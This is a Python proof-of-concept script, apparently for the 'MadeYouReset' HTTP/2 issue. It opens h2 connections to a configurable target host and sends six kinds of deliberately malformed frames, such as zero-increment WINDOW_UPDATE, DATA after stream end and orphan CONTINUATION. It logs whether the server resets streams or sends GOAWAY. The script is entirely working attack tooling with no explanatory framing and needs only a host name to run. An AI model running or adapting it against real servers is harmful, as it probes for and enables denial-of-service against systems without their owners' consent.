#!/usr/bin/env python3 import ssl, socket, time, struct, csv, os from datetime import datetime from h2.connection import H2Connection from h2.events import ResponseReceived, StreamReset, SettingsAcknowledged TARGET_HOST = "dominio.com.br" TARGET_PORT = 443 PATHS = ["/path"] ATTEMPTS_PER_VECTOR = 10 SLEEP_BETWEEN = 0.02 CSV_OUT = "poc_madeyoureset_results.csv" UA = "madeyoureset-poc" def send_frame(sock, frame_type, flags, stream_id, payload): hdr = struct.pack("!I", ((len(payload) & 0xFFFFFF) << 8) | (frame_type & 0xFF)) hdr += struct.pack("!B", flags & 0xFF) hdr += struct.pack("!I", stream_id & 0x7FFFFFFF) sock.sendall(hdr + payload) def frame_window_update(sock, stream_id, increment): payload = struct.pack("!I", increment & 0x7FFFFFFF) send_frame(sock, 0x8, 0x0, stream_id, payload) def frame_data_after_end(sock, stream_id): send_frame(sock, 0x0, 0x0, stream_id, b"x") def frame_headers_zero_len(sock, stream_id): send_frame(sock, 0x1, 0x4, stream_id, b"") def frame_priority_bad_len(sock, stream_id): send_frame(sock, 0x2, 0x0, stream_id, b"\x00\x00\x00\x00") def frame_continuation_without_headers(sock, stream_id): send_frame(sock, 0x9, 0x4, stream_id, b"") def open_h2_socket(host, port): ctx = ssl.create_default_context() ctx.set_alpn_protocols(["h2"]) s = socket.create_connection((host, port)) tls = ctx.wrap_socket(s, server_hostname=host) if tls.selected_alpn_protocol() != "h2": raise RuntimeError("ALPN não negociou h2") tls.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) return tls def init_h2(tls_sock): h2c = H2Connection() h2c.initiate_connection() tls_sock.sendall(h2c.data_to_send()) tls_sock.settimeout(0.5) try: d = tls_sock.recv(65535) if d: h2c.receive_data(d) tls_sock.sendall(h2c.data_to_send()) except Exception: pass return h2c def do_attempt(vector_name, attempt_idx, path): rec = { "ts": datetime.utcnow().isoformat() + "Z", "vector": vector_name, "attempt": attempt_idx, "path": path, "rst_stream": 0, "goaway": 0, "responses": 0, "conn_closed_early": 0, "error": "" } try: sock = open_h2_socket(TARGET_HOST, TARGET_PORT) h2c = init_h2(sock) qs = f"?poc=madeyoureset&v={vector_name}&n={attempt_idx}" full_path = path + qs stream_id = h2c.get_next_available_stream_id() end_stream_first = vector_name in { "V1_WINDOW_UPDATE_ZERO_STREAM", "V3_DATA_AFTER_END", "V4_HEADERS_ZERO_LEN_AFTER_END", "V5_PRIORITY_BAD_LEN_AFTER_END", } try: h2c.send_headers(stream_id, [ (":method", "GET"), (":scheme", "https"), (":authority", TARGET_HOST), (":path", full_path), ("user-agent", UA), ("x-poc-vector", f"{vector_name}-{attempt_idx}") # Cabeçalho genérico ], end_stream=end_stream_first) sock.sendall(h2c.data_to_send()) except Exception as e: rec["conn_closed_early"] = 1 rec["error"] = f"send_headers: {e}" try: sock.close() except: pass return rec try: if vector_name == "V1_WINDOW_UPDATE_ZERO_STREAM": frame_window_update(sock, stream_id, 0) elif vector_name == "V2_WINDOW_UPDATE_ZERO_CONN": frame_window_update(sock, 0, 0) elif vector_name == "V3_DATA_AFTER_END": frame_data_after_end(sock, stream_id) elif vector_name == "V4_HEADERS_ZERO_LEN_AFTER_END": frame_headers_zero_len(sock, stream_id) elif vector_name == "V5_PRIORITY_BAD_LEN_AFTER_END": frame_priority_bad_len(sock, stream_id) elif vector_name == "V6_CONTINUATION_WITHOUT_HEADERS": sid2 = h2c.get_next_available_stream_id() frame_continuation_without_headers(sock, sid2) else: raise RuntimeError("vetor desconhecido") except Exception as e: rec["error"] = f"send_vector: {e}" sock.settimeout(0.2) t_end = time.time() + 0.6 while time.time() < t_end: try: d = sock.recv(65535) if not d: break events = h2c.receive_data(d) for ev in events: if isinstance(ev, StreamReset): rec["rst_stream"] += 1 elif isinstance(ev, ResponseReceived): rec["responses"] += 1 elif isinstance(ev, SettingsAcknowledged): pass elif ev.__class__.__name__ == "ConnectionTerminated": rec["goaway"] += 1 tosend = h2c.data_to_send() if tosend: sock.sendall(tosend) except Exception: break try: sock.close() except: pass return rec except Exception as e: rec["error"] = f"conn/setup: {e}" rec["conn_closed_early"] = 1 return rec def main(): vectors = [ "V1_WINDOW_UPDATE_ZERO_STREAM", "V2_WINDOW_UPDATE_ZERO_CONN", "V3_DATA_AFTER_END", "V4_HEADERS_ZERO_LEN_AFTER_END", "V5_PRIORITY_BAD_LEN_AFTER_END", "V6_CONTINUATION_WITHOUT_HEADERS", ] new_file = not os.path.exists(CSV_OUT) with open(CSV_OUT, "a", newline="") as f: w = csv.DictWriter(f, fieldnames=[ "ts","vector","attempt","path", "rst_stream","goaway","responses", "conn_closed_early","error" ]) if new_file: w.writeheader() for vec in vectors: for n in range(1, ATTEMPTS_PER_VECTOR + 1): for p in PATHS: rec = do_attempt(vec, n, p) w.writerow(rec) print(rec) time.sleep(SLEEP_BETWEEN) if __name__ == "__main__": print(f"[INFO] Target: https://{TARGET_HOST}:{TARGET_PORT} Paths: {PATHS}") print(f"[INFO] Attempts per vector: {ATTEMPTS_PER_VECTOR}") main()